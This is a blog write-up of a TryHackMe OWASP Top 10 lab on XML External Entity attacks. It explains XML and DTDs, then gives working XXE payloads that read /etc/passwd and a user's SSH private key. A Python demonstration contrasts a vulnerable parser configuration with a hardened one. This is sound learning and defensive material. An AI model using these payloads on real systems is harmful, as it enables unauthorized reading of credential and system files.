Sunday 30 January 2022

XXE(XML External Entity) - TryHackMe - OWASP TOP 10

 

Finally I am here with the topic that I was frightened of for no reason. Now I am happy that I did not give in to my fears.

 


An XML External Entity (XXE) attack is a vulnerability that abuses the way XML parsers process entities declared in attacker-supplied XML. It often lets an attacker interact with backend or external systems that the application itself can reach, and it can let the attacker read files on the server the parser runs on.

 

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).


1) In an in-band XXE attack, the attacker receives an immediate response containing the result of the XXE payload (for example, the contents of a file reflected in the HTTP response).

2) In an out-of-band XXE attack (also called blind XXE), the web application returns no direct output, so the attacker must make the parser send the result of the payload somewhere else, such as a file the attacker can later read or a server the attacker controls.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable; it is widely used for storing and transporting data.

An XML document usually starts with an XML prolog:

<?xml version="1.0" encoding="UTF-8"?>

The prolog states the XML version and the character encoding of the document. It is not mandatory, but including it is considered good practice. Let's consider the example below:

<?xml version="1.0" encoding="UTF-8"?>
<mail>
  <to>test111</to>
  <from>boost</from>
  <subject>About XXE</subject>
  <text>Teach about XXE</text>
</mail>


The <mail> element is the ROOT element of the XML document. A document with no root element, or with more than one top-level element, is not well-formed XML and will be rejected by the parser.

All the other elements are children of the root. Elements can also carry attributes (name="value" pairs inside the start tag, for example a category or message attribute), although the example above does not use any.

XXE – DTD

DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.

Let us try to understand this with the help of an example. Say we have the following DTD. Here it is written as an internal subset directly inside the DOCTYPE declaration; a separate file such as test.dtd would contain only the four <!ELEMENT> lines and would be pulled in with <!DOCTYPE note SYSTEM "test.dtd">.

<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>

#PCDATA means parsed character data, i.e. text that the parser examines for markup and entity references. A validating parser can check an XML document against this DTD and reject it if it does not conform to the rules. Let's use a document that follows this DTD to understand how validation works (the earlier <mail> example would fail validation here, because the DTD declares a note root with to, from, heading and body children and knows nothing about mail, subject or text):

<?xml version="1.0" encoding="UTF-8"?>
<note>
  <to>test111</to>
  <from>boost</from>
  <heading>About XXE</heading>
  <body>Teach about XXE</body>
</note>

1.    !DOCTYPE note - Defines the root element of the document as note

2.    !ELEMENT note - Defines that the note element must contain the elements to, from, heading and body, in that order

3.    !ELEMENT to - Defines the to element to be of type #PCDATA

4.    !ELEMENT from - Defines the from element to be of type #PCDATA

5.    !ELEMENT heading - Defines the heading element to be of type #PCDATA

6.    !ELEMENT body - Defines the body element to be of type #PCDATA

7.    Note: !ENTITY - Defines a named piece of data (an entity) inside the DTD; the document can then reference it as &name; and the parser substitutes the value wherever the reference appears. This is the declaration that XXE abuses.


Now let us look at some payloads and how they work.

 

<!DOCTYPE replace [<!ENTITY name "boost"> ]>
<userInfo>
  <firstName>falcon</firstName>
  <lastName>&name;</lastName>
</userInfo>


As we can see, we define an entity called name and give it the value "boost". Later we reference it as &name; in the lastName element, and the parser replaces the reference with "boost" when it processes the document. This is an internal entity: its value is written directly in the DTD.


<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>


We use the syntax above to read a file from the server by declaring an entity with the SYSTEM keyword, which makes it an external entity whose value is fetched from a URI. Here the entity is named read and its value is the URI file:///etc/passwd, so when the parser expands &read; it loads that file and places its contents inside the root element. If the application reflects the parsed data back, the file contents appear in the response (an in-band XXE). This only works if the parser is configured to resolve external entities and the account the application runs as can read the file.




 


<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>


By submitting the payload above, we can read the SSH private key of the user falcon, subject to the same conditions: the parser must resolve external entities and the process must have permission to read the key file. Note that the content of an external entity is parsed as XML, so a file containing raw < or & characters can produce a parse error instead of being disclosed; a PEM-encoded key contains neither, which is why this target works so well.
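To see the mechanism end to end, here is an added example (my own code, not from the TryHackMe room or the original post) that feeds a payload of exactly this shape to Python's xml.sax parser twice: once with external general entities enabled, which reproduces the vulnerable parser configuration, and once with them disabled, which has been the default since Python 3.7.1. Instead of /etc/passwd or id_rsa it writes a constructed stand-in secret to a temporary file so it runs anywhere; the SAMPLE_SECRET value, the temporary file and the helper names are assumptions of the example.

```python
"""Added example: one XXE payload against Python's xml.sax parser, with
external general entities enabled (vulnerable) and disabled (hardened).
Not part of the TryHackMe room; the names and sample data are assumptions."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed stand-in for /etc/passwd or ~/.ssh/id_rsa so the example runs anywhere.
SAMPLE_SECRET = "db_password=hunter2"


class _TextCollector(xml.sax.ContentHandler):
    """Collects the character data of the document, i.e. what an application
    that echoes the parsed fields back to the user would return."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def build_payload(file_uri: str) -> bytes:
    """Same shape as the page's payload: a SYSTEM entity pointing at a file URI."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE root [<!ENTITY read SYSTEM '{file_uri}'>]>\n"
        "<root>&read;</root>\n"
    ).encode()


def parse_untrusted(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse attacker-controlled XML and return the text an app would reflect.

    resolve_external=True reproduces the vulnerable configuration, in which the
    parser fetches the URI behind &read; and splices the file in as text.
    resolve_external=False is the hardened one (and xml.sax's default since
    Python 3.7.1): the external entity reference is dropped, so nothing leaks."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo() -> dict:
    """Write the constructed secret to a temp file and attack it both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(SAMPLE_SECRET)
        secret_path = fh.name
    try:
        payload = build_payload(pathlib.Path(secret_path).as_uri())
        return {
            "vulnerable": parse_untrusted(payload, resolve_external=True),
            "hardened": parse_untrusted(payload, resolve_external=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode:10s} -> {text!r}")
```

Run it and the vulnerable mode prints the secret while the hardened mode prints an empty string: the reference to &read; is simply dropped rather than expanded. The check is the same in any stack: find out whether the parser you use resolves external entities by default and, if it does, turn DTD processing or external entity loading off explicitly; in Python the defusedxml package wraps the standard library parsers with exactly these protections.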






That's it folks!!! Will be adding a few new blogs on the OWASP TOP 10 Labs.

 


